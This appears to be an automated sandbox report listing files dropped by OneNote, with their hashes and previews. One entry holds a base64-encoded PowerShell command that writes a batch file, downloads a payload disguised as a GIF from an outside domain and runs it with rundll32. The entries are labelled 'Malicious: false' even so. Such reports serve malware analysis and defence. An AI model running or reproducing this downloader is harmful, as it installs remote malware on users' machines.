Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{72CD3BD6-C4FA-4617-9DD8-FC23F5C289D8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6503250853185918
Encrypted:	false
SSDEEP:	6:RaQjYyfB3h1RRXUnfekMfsR2R2R2jKf9iCtkRlr+2tkRlXBRujlw//0lweI/wT2p:RaaYyf9/UfekUQQS9i4kRXkREWf/lkRs
MD5:	453887D3544B6C6DB24D206C07354C33
SHA1:	E66BC91102A3C3E92E6FA37D12A13CF9ADE8765A
SHA-256:	D07BB3249B95C4E53C5C14C358667DCA68D8A80727D53E339706DB0F4556ACD3
SHA-512:	AE3CCF00636A8749E28AAB380E43882C1EE396ED0C49A71D926D1EDADAD81FD7288182AC756090C2D38C8FC8EFB659907CB86307DAA37295CE18FD11D0553C2F
Malicious:	false
Preview:	./.C..vL....W"v_..e.G..I..z'.Y.j................?.....I...............................................................................................................h...........................................Dq.R..pJ..)5..~..........u...y.L.}G..[4g.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{76853361-92BD-49F4-9AAE-DF90E5C934ED}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Temp\{76AA41D4-2F99-444F-9560-7B980902BD00}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6458623790418864
Encrypted:	false
SSDEEP:	6:RaY0HGBjYyfB3h1RRXUnfc9i8swR2R2R2jKyVTKV/BRujlw//0lweI/QnV/jRujd:RasjYyf9/Ufc96DQQ7VeV+Wf/eVS
MD5:	BEEAC7ADE54A0118F6049E5CCF168D03
SHA1:	002A6149514886F77FA4D3618394E731A8F6FBCB
SHA-256:	F68BC76FCC577F4A019D06AF0FE5A3F8ED91E5E3389EE1FE696D74873D529698
SHA-512:	4AB6CE69ACDF5D203AF72B954959E0D87D7D4A279BECC48758622ABC4864DF6FABF1A21CA7EA3AFFBB14B4F3A38EE9ECFBC53E69166173ECDE998C3FC117964A
Malicious:	false
Preview:	./.C..vL....W"v_......H......X................?.....I...............................................................................................................h................................................:D....%.............[..0L.bU.gRO..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{7C63BE7D-6B45-47A5-9941-5D065A59AEAC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{808935FA-C9B2-4DCC-8FF3-987855D3A1C3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Temp\{8598C563-9511-45C5-AAC2-3CF5AB977DB5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Temp\{8EDBB254-7EA6-44AB-9951-7853BE1BE7CD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Temp\{8F393314-61C6-4D2A-8127-1F7CD08E2107}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
SSDEEP:	3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
MD5:	8D804A60E86627383BED6280ED62F1CF
SHA1:	E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
SHA-256:	494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
SHA-512:	0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY\|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..\|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....\|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..\|....n...o....`.nk.#.%x......-\|...\|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

C:\Users\user\AppData\Local\Temp\{900076E8-26E5-4946-83F6-8467A20E1459}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Temp\{91ED022A-AC89-4CFC-9121-3CAD01CAA87F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Temp\{921F0FDE-FFB8-4C6E-A95C-550AC02A84DF}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{942B388E-15BF-4F76-B5D8-7F6A9919906E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Temp\{9431B56E-5715-4AA8-886B-EBD3326A9C2D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Temp\{9B1E9395-A55C-4856-80D5-4F1CA1F12FC6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Temp\{9B4610FF-21C1-411B-8B75-48787D8FCE73}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (380), with no line terminators
Category:	dropped
Size (bytes):	380
Entropy (8bit):	5.853345406863477
Encrypted:	false
SSDEEP:	6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSP8A/lKaHoyCRjpm+Rs3FEY9hMS/aXXrZQ:ssLgyaI4HPKC2EwgvBSU6Ij4+RIFE4qg
MD5:	4B1934D97AE633B5C88F3424B4953761
SHA1:	9EADA74C008237311CBA7367A69A9D291ACE70F2
SHA-256:	74B3A5F20FDB37F8F26025E768EDDDCC08568542402033955C97AF6D8E5D61B4
SHA-512:	04980D507ACC647FA732429DCBB71632FB0F410523E56E39C32F0B89ECA342967DFFC4316B97D0881ABC0C1E7AC2D1A8AAC39B33D00EE0763076A1B65FD2FB99
Malicious:	false
Preview:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Temp\{9D1CBB81-C163-4CAD-8603-7B7D37DC7163}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Temp\{9D9FF69C-3D25-46D9-990D-928F506B430A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

